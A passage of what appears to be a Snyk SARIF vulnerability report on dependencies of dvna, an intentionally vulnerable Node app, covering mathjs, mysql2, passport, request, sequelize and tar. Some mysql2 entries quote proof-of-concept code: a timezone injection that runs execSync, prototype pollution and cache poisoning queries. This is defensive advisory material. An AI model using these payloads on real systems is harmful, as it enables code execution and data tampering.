paths\n* _Introduced through_: dvna@0.0.1 › mathjs@3.10.1\n# Overview\n[`mathjs`](https://www.npmjs.com/package/mathjs) is an extensive math library for JavaScript and Node.js\n\nAffected versions of the package are vulnerable to Arbitrary Code Execution via `typed-function`. A malicious user could possibly execute arbitrary code in the JavaScript engine, by creating a typed function with JavaScript code in the name.\n\n# Remediation\nUpgrade `mathjs` to version 3.17.0 or higher.\n\n# References\n- [GitHub Changelog](https://github.com/josdejong/mathjs/blob/master/HISTORY.md#2017-11-18-version-3170)\n- [GitHub Commit](https://github.com/josdejong/mathjs/commit/8d2d48d81b3c233fb64eb2ec1d7a9e1cf6a55a90)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "npm" + ], + "cvssv3_baseScore": 7.3, + "security-severity": "7.3" + } + }, + { + "id": "npm:mathjs:20171118-1", + "shortDescription": { + "text": "Critical severity - Arbitrary Code Execution vulnerability in mathjs" + }, + "fullDescription": { + "text": "(CVE-2017-1001003) mathjs@3.10.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: mathjs\n* Introduced through: dvna@0.0.1 and mathjs@3.10.1\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › mathjs@3.10.1\n# Overview\n[`mathjs`](https://www.npmjs.com/package/mathjs) is an extensive math library for JavaScript and Node.js\n\nAffected versions of the package are vulnerable to Arbitrary Code Execution. Forbidden properties like constructor could be replaced by using unicode characters when creating an object.\n\n# Remediation\nUpgrade `mathjs` to version 3.17.0 or higher.\n\n# References\n- [GitHub Changelog](https://github.com/josdejong/mathjs/blob/master/HISTORY.md#2017-11-18-version-3170)\n- [GitHub Commit](https://github.com/josdejong/mathjs/commit/a60f3c8d9dd714244aed7a5569c3dccaa3a4e761)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "npm" + ], + "cvssv3_baseScore": 9.8, + "security-severity": "9.8" + } + }, + { + "id": "SNYK-JS-MYSQL2-6591084", + "shortDescription": { + "text": "Medium severity - Prototype Poisoning vulnerability in mysql2" + }, + "fullDescription": { + "text": "(CVE-2024-21509) mysql2@1.7.0" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: mysql2\n* Introduced through: dvna@0.0.1 and mysql2@1.7.0\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › mysql2@1.7.0\n# Overview\n[mysql2](https://www.npmjs.com/package/mysql2) is a mostly API compatible with mysqljs and supports majority of features.\n\nAffected versions of this package are vulnerable to Prototype Poisoning due to insecure `results` object creation and improper user input sanitization passed through `parserFn` in `text_parser.js` and `binary_parser.js`.\n# PoC\n```sql\r\nSELECT CAST('{\"toString\": {\"toString\":true}, \"tags\": {\"a\": 1, \"b\": null}}' as JSON) AS __proto__;\r\n```\r\n\r\n```js\r\nObject.getPrototypeOf(results[0])\r\n> { tags: { a: 1, b: null }, toString: { toString: true } }\r\n```\n\n# Details\n\nPrototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as `__proto__`, `constructor` and `prototype`. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the `Object.prototype` are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.\n\nThere are two main ways in which the pollution of prototypes occurs:\n\n- Unsafe `Object` recursive merge\n \n- Property definition by path\n \n\n## Unsafe Object recursive merge\n\nThe logic of a vulnerable recursive merge function follows the following high-level model:\n```\nmerge (target, source)\n\n foreach property of source\n\n if property exists and is an object on both the target and the source\n\n merge(target[property], source[property])\n\n else\n\n target[property] = source[property]\n```\n
\n\nWhen the source object contains a property named `__proto__` defined with `Object.defineProperty()` , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of `Object` and the source of `Object` as defined by the attacker. Properties are then copied on the `Object` prototype.\n\nClone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: `merge({},source)`.\n\n`lodash` and `Hoek` are examples of libraries susceptible to recursive merge attacks.\n\n## Property definition by path\n\nThere are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: `theFunction(object, path, value)`\n\nIf the attacker can control the value of “pathâ€, they can set this value to `__proto__.myValue`. `myValue` is then assigned to the prototype of the class of the object.\n\n# Types of attacks\n\nThere are a few methods by which Prototype Pollution can be manipulated:\n\n| Type |Origin |Short description |\n|--|--|--|\n| **Denial of service (DoS)**|Client |This is the most likely attack.
DoS occurs when `Object` holds generic functions that are implicitly called for various operations (for example, `toString` and `valueOf`).
The attacker pollutes `Object.prototype.someattr` and alters its state to an unexpected value such as `Int` or `Object`. In this case, the code fails and is likely to cause a denial of service.
**For example:** if an attacker pollutes `Object.prototype.toString` by defining it as an integer, if the codebase at any point was reliant on `someobject.toString()` it would fail. |\n |**Remote Code Execution**|Client|Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
**For example:** `eval(someobject.someattr)`. In this case, if the attacker pollutes `Object.prototype.someattr` they are likely to be able to leverage this in order to execute code.|\n|**Property Injection**|Client|The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
**For example:** if a codebase checks privileges for `someuser.isAdmin`, then when the attacker pollutes `Object.prototype.isAdmin` and sets it to equal `true`, they can then achieve admin privileges.|\n\n# Affected environments\n\nThe following environments are susceptible to a Prototype Pollution attack:\n\n- Application server\n \n- Web server\n\n- Web browser\n \n\n# How to prevent\n\n1. Freeze the prototype— use `Object.freeze (Object.prototype)`.\n \n2. Require schema validation of JSON input.\n \n3. Avoid using unsafe recursive merge functions.\n \n4. Consider using objects without prototypes (for example, `Object.create(null)`), breaking the prototype chain and preventing pollution.\n \n5. As a best practice use `Map` instead of `Object`.\n\n## For more information on this vulnerability type:\n\n[Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.†GitHub, 26 May 2018](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf)\n\n# Remediation\nUpgrade `mysql2` to version 3.9.4 or higher.\n# References\n- [GitHub Commit](https://github.com/sidorares/node-mysql2/commit/4a964a3910a4b8de008696c554ab1b492e9b4691)\n- [GitHub PR](https://github.com/sidorares/node-mysql2/pull/2574)\n- [GitHub Release](https://github.com/sidorares/node-mysql2/releases/tag/v3.9.4)\n- [Security Blog](https://blog.slonser.info/posts/mysql2-attacker-configuration/)\n- [Vulnerable Code](https://github.com/sidorares/node-mysql2/blob/fd3d117da82cc5c5fa5a3701d7b33ca77691bc61/lib/parsers/text_parser.js#L134)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-1321", + "npm" + ], + "cvssv3_baseScore": 6.5, + "security-severity": "6.5" + } + }, + { + "id": "SNYK-JS-MYSQL2-6591085", + "shortDescription": { + "text": "Critical severity - Remote Code Execution (RCE) vulnerability in mysql2" + }, + "fullDescription": { + "text": "(CVE-2024-21508) mysql2@1.7.0" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: mysql2\n* Introduced through: dvna@0.0.1 and mysql2@1.7.0\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › mysql2@1.7.0\n# Overview\n[mysql2](https://www.npmjs.com/package/mysql2) is a mostly API compatible with mysqljs and supports majority of features.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) via the `readCodeFor` function due to improper validation of the `supportBigNumbers` and `bigNumberStrings` values.\n# PoC\n```js\r\n {sql:`SELECT INDEX_LENGTH FROM information_schema.tables LIMIT 1`, supportBigNumbers:\"console.log(1337)\"}\r\n```\n# Remediation\nUpgrade `mysql2` to version 3.9.4 or higher.\n# References\n- [GitHub Commit](https://github.com/sidorares/node-mysql2/commit/74abf9ef94d76114d9a09415e28b496522a94805)\n- [GitHub PR](https://github.com/sidorares/node-mysql2/pull/2572)\n- [GitHub Release](https://github.com/sidorares/node-mysql2/releases/tag/v3.9.4)\n- [Security Blog](https://blog.slonser.info/posts/mysql2-attacker-configuration/)\n- [Vulnerable Code](https://github.com/sidorares/node-mysql2/blob/1609b5393516d72a4ae47196837317fbe75e0c13/lib/parsers/text_parser.js#L14C10-L14C21)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "npm" + ], + "cvssv3_baseScore": 9.8, + "security-severity": "9.8" + } + }, + { + "id": "SNYK-JS-MYSQL2-6591300", + "shortDescription": { + "text": "Medium severity - Use of Web Browser Cache Containing Sensitive Information vulnerability in mysql2" + }, + "fullDescription": { + "text": "(CVE-2024-21507) mysql2@1.7.0" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: mysql2\n* Introduced through: dvna@0.0.1 and mysql2@1.7.0\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › mysql2@1.7.0\n# Overview\n[mysql2](https://www.npmjs.com/package/mysql2) is a mostly API compatible with mysqljs and supports majority of features.\n\nAffected versions of this package are vulnerable to Use of Web Browser Cache Containing Sensitive Information through the `keyFromFields` function, resulting in cache poisoning. An attacker can inject a colon (`:`) character within a value of the attacker-crafted key.\n# PoC\n```js\r\n connection.query(\r\n 'SELECT information_schema.tables.TABLE_NAME,`tables:160:63/DATA_LENGTH:8:undefined::tables`.TABLE_ROWS FROM information_schema.tables INNER JOIN information_schema.tables AS `tables:160:63/DATA_LENGTH:8:undefined::tables` ON `tables:160:63/DATA_LENGTH:8:undefined::tables`.TABLE_ROWS!=information_schema.tables.TABLE_ROWS LIMIT 1;',\r\n function(err, results, fields) {\r\n }\r\n );\r\n // Send another request and spwan new connection\r\n connection1.query(\r\n `SELECT TABLE_NAME, TABLE_ROWS, DATA_LENGTH FROM information_schema.tables LIMIT 1;`,\r\n function(err, results, fields) {\r\n console.log(results);\r\n console.log(fields);\r\n }\r\n );\r\n```\r\n\r\n\r\nResults\r\n\r\n```js\r\n[ { TABLE_NAME: 'ADMINISTRABLE_ROLE_AUTHORIZATIONS', TABLE_ROWS: 0 } ]\r\n[\r\n `TABLE_NAME` VARCHAR(64) NOT NULL,\r\n `TABLE_ROWS` BIGINT(21) UNSIGNED,\r\n `DATA_LENGTH` BIGINT(21) UNSIGNED\r\n]\r\n```\n# Remediation\nUpgrade `mysql2` to version 3.9.3 or higher.\n# References\n- [GitHub Commit](https://github.com/sidorares/node-mysql2/commit/0d54b0ca6498c823098426038162ef10df02c818)\n- [GitHub PR](https://github.com/sidorares/node-mysql2/pull/2424)\n- [Security Article](https://blog.slonser.info/posts/mysql2-attacker-configuration/)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-525", + "npm" + ], + "cvssv3_baseScore": 6.5, + "security-severity": "6.5" + } + }, + { + "id": "SNYK-JS-MYSQL2-6670046", + "shortDescription": { + "text": "Critical severity - Arbitrary Code Injection vulnerability in mysql2" + }, + "fullDescription": { + "text": "(CVE-2024-21511) mysql2@1.7.0" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: mysql2\n* Introduced through: dvna@0.0.1 and mysql2@1.7.0\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › mysql2@1.7.0\n# Overview\n[mysql2](https://www.npmjs.com/package/mysql2) is a mostly API compatible with mysqljs and supports majority of features.\n\nAffected versions of this package are vulnerable to Arbitrary Code Injection due to improper sanitization of the `timezone` parameter in the `readCodeFor` function by calling a native MySQL Server date/time function.\n# PoC\n```js\r\nconst mysql = require('mysql2');\r\nconst connection = mysql.createConnection({\r\n host: '127.0.0.1',\r\n user: 'root',\r\n database: 'test',\r\n password: '123456',\r\n});\r\n\r\nlet query_data = {\r\n sql: `SELECT CURDATE();`,\r\n timezone:\r\n \"');''.constructor.constructor('return process')().mainModule.require('child_process').execSync('open /System/Applications/Calculator.app');console.log('\",\r\n};\r\n\r\nconnection.query(query_data, (err, results) => {\r\n if (err) throw err;\r\n console.log(results);\r\n});\r\n\r\nconnection.end();\r\n```\n# Remediation\nUpgrade `mysql2` to version 3.9.7 or higher.\n# References\n- [GitHub Commit](https://github.com/sidorares/node-mysql2/commit/7d4b098c7e29d5a6cb9eac2633bfcc2f0f1db713)\n- [GitHub PR](https://github.com/sidorares/node-mysql2/pull/2608)\n- [GitHub Release](https://github.com/sidorares/node-mysql2/releases/tag/v3.9.7)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "npm" + ], + "cvssv3_baseScore": 9.8, + "security-severity": "9.8" + } + }, + { + "id": "SNYK-JS-MYSQL2-6861580", + "shortDescription": { + "text": "High severity - Prototype Pollution vulnerability in mysql2" + }, + "fullDescription": { + "text": "(CVE-2024-21512) mysql2@1.7.0" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: mysql2\n* Introduced through: dvna@0.0.1 and mysql2@1.7.0\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › mysql2@1.7.0\n# Overview\n[mysql2](https://www.npmjs.com/package/mysql2) is a mostly API compatible with mysqljs and supports majority of features.\n\nAffected versions of this package are vulnerable to Prototype Pollution due to improper user input sanitization passed to fields and tables when using `nestTables`.\n# PoC\n```js\r\n\r\nconst mysql = require('mysql2');\r\nconst connection = mysql.createConnection({\r\nhost: '127.0.0.1',\r\nuser: 'root',\r\ndatabase: 'test',\r\npassword: 'root',\r\n});\r\n\r\nlet query_data = {\r\nsql: `SELECT CAST('{\"admin\":true}' AS JSON)_proto__;`,\r\nnestTables: \"_\",\r\n};\r\n\r\nconnection.query(query_data, (err, results) => {\r\n\r\nif (err) throw err;\r\nconsole.log(Object.getPrototypeOf(results[0]));\r\nconsole.log(results[0].admin);\r\n});\r\n\r\nconnection.end();\r\n\r\n\r\n```\n\n# Details\n\nPrototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as `__proto__`, `constructor` and `prototype`. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the `Object.prototype` are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.\n\nThere are two main ways in which the pollution of prototypes occurs:\n\n- Unsafe `Object` recursive merge\n \n- Property definition by path\n \n\n## Unsafe Object recursive merge\n\nThe logic of a vulnerable recursive merge function follows the following high-level model:\n```\nmerge (target, source)\n\n foreach property of source\n\n if property exists and is an object on both the target and the source\n\n merge(target[property], source[property])\n\n else\n\n target[property] = source[property]\n```\n
\n\nWhen the source object contains a property named `__proto__` defined with `Object.defineProperty()` , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of `Object` and the source of `Object` as defined by the attacker. Properties are then copied on the `Object` prototype.\n\nClone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: `merge({},source)`.\n\n`lodash` and `Hoek` are examples of libraries susceptible to recursive merge attacks.\n\n## Property definition by path\n\nThere are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: `theFunction(object, path, value)`\n\nIf the attacker can control the value of “pathâ€, they can set this value to `__proto__.myValue`. `myValue` is then assigned to the prototype of the class of the object.\n\n# Types of attacks\n\nThere are a few methods by which Prototype Pollution can be manipulated:\n\n| Type |Origin |Short description |\n|--|--|--|\n| **Denial of service (DoS)**|Client |This is the most likely attack.
DoS occurs when `Object` holds generic functions that are implicitly called for various operations (for example, `toString` and `valueOf`).
The attacker pollutes `Object.prototype.someattr` and alters its state to an unexpected value such as `Int` or `Object`. In this case, the code fails and is likely to cause a denial of service.
**For example:** if an attacker pollutes `Object.prototype.toString` by defining it as an integer, if the codebase at any point was reliant on `someobject.toString()` it would fail. |\n |**Remote Code Execution**|Client|Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
**For example:** `eval(someobject.someattr)`. In this case, if the attacker pollutes `Object.prototype.someattr` they are likely to be able to leverage this in order to execute code.|\n|**Property Injection**|Client|The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
**For example:** if a codebase checks privileges for `someuser.isAdmin`, then when the attacker pollutes `Object.prototype.isAdmin` and sets it to equal `true`, they can then achieve admin privileges.|\n\n# Affected environments\n\nThe following environments are susceptible to a Prototype Pollution attack:\n\n- Application server\n \n- Web server\n\n- Web browser\n \n\n# How to prevent\n\n1. Freeze the prototype— use `Object.freeze (Object.prototype)`.\n \n2. Require schema validation of JSON input.\n \n3. Avoid using unsafe recursive merge functions.\n \n4. Consider using objects without prototypes (for example, `Object.create(null)`), breaking the prototype chain and preventing pollution.\n \n5. As a best practice use `Map` instead of `Object`.\n\n## For more information on this vulnerability type:\n\n[Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.†GitHub, 26 May 2018](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf)\n\n# Remediation\nUpgrade `mysql2` to version 3.9.8 or higher.\n# References\n- [GitHub Commit](https://github.com/sidorares/node-mysql2/commit/efe3db527a2c94a63c2d14045baba8dfefe922bc)\n- [GitHub Gist](https://gist.github.com/domdomi3/e9f0f9b9b1ed6bfbbc0bea87c5ca1e4a)\n- [GitHub PR](https://github.com/sidorares/node-mysql2/pull/2702)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-1321", + "npm" + ], + "cvssv3_baseScore": 8.2, + "security-severity": "8.2" + } + }, + { + "id": "SNYK-JS-PASSPORT-2840631", + "shortDescription": { + "text": "Medium severity - Session Fixation vulnerability in passport" + }, + "fullDescription": { + "text": "(CVE-2022-25896) passport@0.4.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: passport\n* Introduced through: dvna@0.0.1 and passport@0.4.1\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › passport@0.4.1\n# Overview\n[passport](https://www.npmjs.org/package/passport) is a Simple, unobtrusive authentication for Node.js.\n\nAffected versions of this package are vulnerable to Session Fixation. When a user logs in or logs out, the session is regenerated instead of being closed.\n# Remediation\nUpgrade `passport` to version 0.6.0 or higher.\n# References\n- [GitHub Commit](https://github.com/jaredhanson/passport/commit/7e9b9cf4d7be02428e963fc729496a45baeea608)\n- [GitHub PR](https://github.com/jaredhanson/passport/pull/900)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-384", + "npm" + ], + "cvssv3_baseScore": 4.8, + "security-severity": "4.8" + } + }, + { + "id": "SNYK-JS-REQUEST-3361831", + "shortDescription": { + "text": "Medium severity - Server-side Request Forgery (SSRF) vulnerability in request" + }, + "fullDescription": { + "text": "(CVE-2023-28155) request@2.88.2" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: request\n* Introduced through: dvna@0.0.1, bcrypt@1.0.3 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › request@2.88.2\n# Overview\n[request](https://www.npmjs.com/package/request) is a simplified http request client.\n\nAffected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to insufficient checks in the `lib/redirect.js` file by allowing insecure redirects in the default configuration, via an attacker-controller server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP).\r\n\r\n**NOTE:** `request` package has been deprecated, so a fix is not expected. See https://github.com/request/request/issues/3142.\n# Remediation\nA fix was pushed into the `master` branch but not yet published.\n# References\n- [GitHub Commit](https://github.com/request/request/commit/d42332182512e56ba68446f49c3e3711e04301a2)\n- [GitHub Issue](https://github.com/request/request/issues/3442)\n- [GitHub PR](https://github.com/request/request/pull/3444)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-918", + "npm" + ], + "cvssv3_baseScore": 6.5, + "security-severity": "6.5" + } + }, + { + "id": "SNYK-JS-SEQUELIZE-2932027", + "shortDescription": { + "text": "Critical severity - SQL Injection vulnerability in sequelize" + }, + "fullDescription": { + "text": "(CVE-2023-25813) sequelize@4.44.4" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: sequelize\n* Introduced through: dvna@0.0.1 and sequelize@4.44.4\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › sequelize@4.44.4\n# Overview\n[sequelize](http://docs.sequelizejs.com/) is a promise-based Node.js ORM for Postgres, MySQL, MariaDB, SQLite and Microsoft SQL Server.\n\nAffected versions of this package are vulnerable to SQL Injection via the `replacements` statement. It allowed a malicious actor to pass dangerous values such as `OR true; DROP TABLE` users through replacements which would result in arbitrary SQL execution.\n# Remediation\nUpgrade `sequelize` to version 6.19.1 or higher.\n# References\n- [Github Issues](https://github.com/sequelize/sequelize/issues/14519)\n- [Github Releases](https://github.com/sequelize/sequelize/releases/tag/v6.19.1)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-89", + "npm" + ], + "cvssv3_baseScore": 9.4, + "security-severity": "9.4" + } + }, + { + "id": "SNYK-JS-SEQUELIZE-2959225", + "shortDescription": { + "text": "High severity - SQL Injection vulnerability in sequelize" + }, + "fullDescription": { + "text": "sequelize@4.44.4" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: sequelize\n* Introduced through: dvna@0.0.1 and sequelize@4.44.4\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › sequelize@4.44.4\n# Overview\n[sequelize](http://docs.sequelizejs.com/) is a promise-based Node.js ORM for Postgres, MySQL, MariaDB, SQLite and Microsoft SQL Server.\n\nAffected versions of this package are vulnerable to SQL Injection due to an improper escaping for multiple appearances of `$` in a string.\n# Remediation\nUpgrade `sequelize` to version 6.21.2 or higher.\n# References\n- [GitHub Commit](https://github.com/sequelize/sequelize/commit/7bb60e3531127da684cc1f75307410c53dfc9c8c)\n- [GitHub Issue](https://github.com/sequelize/sequelize/issues/14601)\n- [GitHub PR](https://github.com/sequelize/sequelize/pull/14678)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-89", + "npm" + ], + "cvssv3_baseScore": 7, + "security-severity": "7" + } + }, + { + "id": "SNYK-JS-SEQUELIZE-3324088", + "shortDescription": { + "text": "High severity - Improper Filtering of Special Elements vulnerability in sequelize" + }, + "fullDescription": { + "text": "(CVE-2023-22578) sequelize@4.44.4" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: sequelize\n* Introduced through: dvna@0.0.1 and sequelize@4.44.4\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › sequelize@4.44.4\n# Overview\n[sequelize](http://docs.sequelizejs.com/) is a promise-based Node.js ORM for Postgres, MySQL, MariaDB, SQLite and Microsoft SQL Server.\n\nAffected versions of this package are vulnerable to Improper Filtering of Special Elements due to attributes not being escaped if they included `(` and `)`, or were equal to `*` and were split if they included the character `.`.\n# Remediation\nUpgrade `sequelize` to version 6.29.0 or higher.\n# References\n- [DIVD CSIRT](https://csirt.divd.nl/CVE-2023-22578)\n- [GitHub Commit](https://github.com/sequelize/sequelize/commit/344c404eac7393fd5d460cb65eca835c764763d2)\n- [GitHub PR](https://github.com/sequelize/sequelize/pull/15374)\n- [GitHub PR](https://github.com/sequelize/sequelize/pull/15710)\n- [GitHub Release](https://github.com/sequelize/sequelize/releases/tag/v7.0.0-alpha.20)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-790", + "npm" + ], + "cvssv3_baseScore": 8.3, + "security-severity": "8.3" + } + }, + { + "id": "SNYK-JS-SEQUELIZE-3324089", + "shortDescription": { + "text": "Medium severity - Information Exposure vulnerability in sequelize" + }, + "fullDescription": { + "text": "(CVE-2023-22580) sequelize@4.44.4" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: sequelize\n* Introduced through: dvna@0.0.1 and sequelize@4.44.4\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › sequelize@4.44.4\n# Overview\n[sequelize](http://docs.sequelizejs.com/) is a promise-based Node.js ORM for Postgres, MySQL, MariaDB, SQLite and Microsoft SQL Server.\n\nAffected versions of this package are vulnerable to Information Exposure due to improper user-input, by allowing an attacker to create malicious queries leading to SQL errors.\n# Remediation\nUpgrade `sequelize` to version 6.28.1 or higher.\n# References\n- [DIVD CSIRT](https://csirt.divd.nl/DIVD-2022-00020/)\n- [GitHub Commit](https://github.com/sequelize/sequelize/commit/6c71dbd6a224f77955cb17eab982cef1c44ed521)\n- [GitHub PR](https://github.com/sequelize/sequelize/pull/15375)\n- [GitHub PR Backport](https://github.com/sequelize/sequelize/pull/15699)\n- [GitHub Release](https://github.com/sequelize/sequelize/releases/tag/v7.0.0-alpha.20)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-200", + "npm" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JS-SEQUELIZE-3324090", + "shortDescription": { + "text": "Medium severity - Access of Resource Using Incompatible Type ('Type Confusion') vulnerability in sequelize" + }, + "fullDescription": { + "text": "(CVE-2023-22579) sequelize@4.44.4" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: sequelize\n* Introduced through: dvna@0.0.1 and sequelize@4.44.4\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › sequelize@4.44.4\n# Overview\n[sequelize](http://docs.sequelizejs.com/) is a promise-based Node.js ORM for Postgres, MySQL, MariaDB, SQLite and Microsoft SQL Server.\n\nAffected versions of this package are vulnerable to Access of Resource Using Incompatible Type ('Type Confusion') due to improper user-input sanitization, due to unsafe fall-through in `GET WHERE` conditions.\n# Remediation\nUpgrade `sequelize` to version 6.28.1 or higher.\n# References\n- [DIVD CSIRT](https://csirt.divd.nl/CVE-2023-22579)\n- [GitHub Commit](https://github.com/sequelize/sequelize/commit/6c71dbd6a224f77955cb17eab982cef1c44ed521)\n- [GitHub PR](https://github.com/sequelize/sequelize/pull/15375)\n- [GitHub PR Backport](https://github.com/sequelize/sequelize/pull/15699)\n- [GitHub Release](https://github.com/sequelize/sequelize/releases/tag/v7.0.0-alpha.20)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-843", + "npm" + ], + "cvssv3_baseScore": 6.3, + "security-severity": "6.3" + } + }, + { + "id": "SNYK-JS-TAR-1536528", + "shortDescription": { + "text": "High severity - Arbitrary File Overwrite vulnerability in tar" + }, + "fullDescription": { + "text": "(CVE-2021-32803) tar@2.2.2" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: tar\n* Introduced through: dvna@0.0.1, bcrypt@1.0.3 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar@2.2.2\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar-pack@3.4.1 › tar@2.2.2\n# Overview\n[tar](https://www.npmjs.com/package/tar) is a full-featured Tar for Node.js.\n\nAffected versions of this package are vulnerable to Arbitrary File Overwrite. This is due to insufficient symlink protection.\r\n`node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary `stat` calls to determine whether a given path is a directory, paths are cached when directories are created.\r\n\r\nThis logic is insufficient when extracting tar files that contain both a directory and a symlink with the same name as the directory. This order of operations results in the directory being created and added to the `node-tar` directory cache. When a directory is present in the directory cache, subsequent calls to `mkdir` for that directory are skipped.\r\nHowever, this is also where `node-tar` checks for symlinks occur. By first creating a directory, and then replacing that directory with a symlink, it is possible to bypass `node-tar` symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location.\n# Remediation\nUpgrade `tar` to version 3.2.3, 4.4.15, 5.0.7, 6.1.2 or higher.\n# References\n- [GitHub Commit](https://github.com/npm/node-tar/commit/9dbdeb6df8e9dbd96fa9e84341b9d74734be6c20)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-22", + "npm" + ], + "cvssv3_baseScore": 8.2, + "security-severity": "8.2" + } + }, + { + "id": "SNYK-JS-TAR-1536531", + "shortDescription": { + "text": "High severity - Arbitrary File Overwrite vulnerability in tar" + }, + "fullDescription": { + "text": "(CVE-2021-32804) tar@2.2.2" + }, + "help": { + "text": "", + "markdown": "* Package Manager: npm\n* Vulnerable module: tar\n* Introduced through: dvna@0.0.1, bcrypt@1.0.3 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar@2.2.2\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar-pack@3.4.1 › tar@2.2.2\n# Overview\n[tar](https://www.npmjs.com/package/tar) is a full-featured Tar for Node.js.\n\nAffected versions of this package are vulnerable to Arbitrary File Overwrite. This is due to insufficient absolute path sanitization.\r\n\r\n`node-tar` aims to prevent extraction of absolute file paths by turning absolute paths into relative paths when the `preservePaths` flag is not set to `true`. This is achieved by stripping the absolute path root from any absolute file paths contained in a tar file. For example, the path `/home/user/.bashrc` would turn into `home/user/.bashrc`.\r\n\r\nThis logic is insufficient when file paths contain repeated path roots such as `////home/user/.bashrc`. `node-tar` only strips a single path root from such paths. When given an absolute file path with repeating path roots, the resulting path (e.g. `///home/user/.bashrc`) still resolves to an absolute path.\n# Remediation\nUpgrade `tar` to version 3.2.2, 4.4.14, 5.0.6, 6.1.1 or higher.\n# References\n- [GitHub Commit](https://github.com/npm/node-tar/commit/1f036ca23f64a547bdd6c79c1a44bc62e8115da4)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-22", + "npm" + ], + 